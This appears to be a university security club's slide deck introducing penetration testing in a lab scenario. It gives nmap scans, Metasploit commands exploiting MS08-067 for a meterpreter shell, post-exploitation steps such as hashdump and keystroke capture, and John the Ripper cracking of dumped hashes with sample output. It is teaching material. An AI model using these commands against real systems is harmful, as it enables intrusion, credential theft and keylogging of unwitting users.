Penetration Testing 101

(Boot-camp)

Computer Security GroupMitchell Adair

utdcsg.org

Outline

“Interactive” meeting Introduction to Backtrack

A mini penetration test Scenario Methodology

Enumeration, Exploitation, Post Exploitation Exercise Summary Resources

Scenario

Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations.

You take it back to the lab and begin to test it...

Outline

Enumeration OS, services, versions, filters

Exploitation Match a service + version to a known vulnerability Exploit, getting shell access to the box

Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot, …

Enumeration

'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org

nmap [Scan Type(s)] [Options] {target specification}

Scan Types -sS, Syn -sT, Connect -sA, Ack …

Options -O, OS -sV, services -v, verbose …

… Enumeration

nmap 192.168.1.1 Default scan, full SYN, top 1000 ports

nmap -v -sV -O 192.168.1.1 -p 1-65535 Verbose, services, OS, ports 1 through 65535

nmap -PN --script=smb* -sV -O 192.168.1.1 Don't ping, run all smb* scripts, service, OS

Nmap OutputNot shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)...OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 ...Host script results:| smb-os-discovery: Windows 2000| smb-enum-domains: | Domain: MITCHELL-32D5C5| |_ SID: S-1-5-21-606747145-1647877149-725345543| |_ Users: add, Administrator, Guest, s3cr3tus3r, sally... | Anonymous shares: IPC$|_ Restricted shares: ADMIN$, C$...| smb-check-vulns:|_ MS08-067: VULNERABLE

Exploitation

Metasploit – Penetration Testing Framework tools, libraries, modules, and user interfaces

# msfconsole msf >

use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >

set RHOST 192.168.1.1 set PAYLOAD windows/meterpreter/bind_tcp exploit

Post Exploitation Gather useful information

SSH & GPG keys, hashes, etc... Meterpreter “post” modules

Pivot meterpreter > hashdump

sysinfo keyscan_(start | stop | dump) download migrate shell

… Post Exploitation

We dumped the hashes... now what? Pass the hash Crack the hash

John the Ripper a tool to find weak passwords of your users

John [options] password-files --wordlist --users, --groups --session, --restore

… Post Exploitation

John --wordlist=/.../password.lst /tmp/hashes.txt

Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])

ABC123 (sally)SECRET (s3cr3tus3r) (Guest)BASKETB (webmaster:1)ALL (webmaster:2)ADMIN1 (Administrator)

guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO - ZHONGGU

So... let's get started

Boot up to your Backtrack CD passwd /etc/init.d/networking start startx Follow along... let's pwn this box :)

Summary

Clearly... Company X's default user workstations needs some work.

Now let's do the paperwork!... just kidding ;) Hopefully this gives everyone a hands on

introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated!

Resources

utdcsg.org Presentations, articles, resources, etc. IRC - irc.oftc.net, #utdcsg

Nmap - nmap.org/5/ Metasploit - metasploit.com/ John the Ripper - openwall.com/john/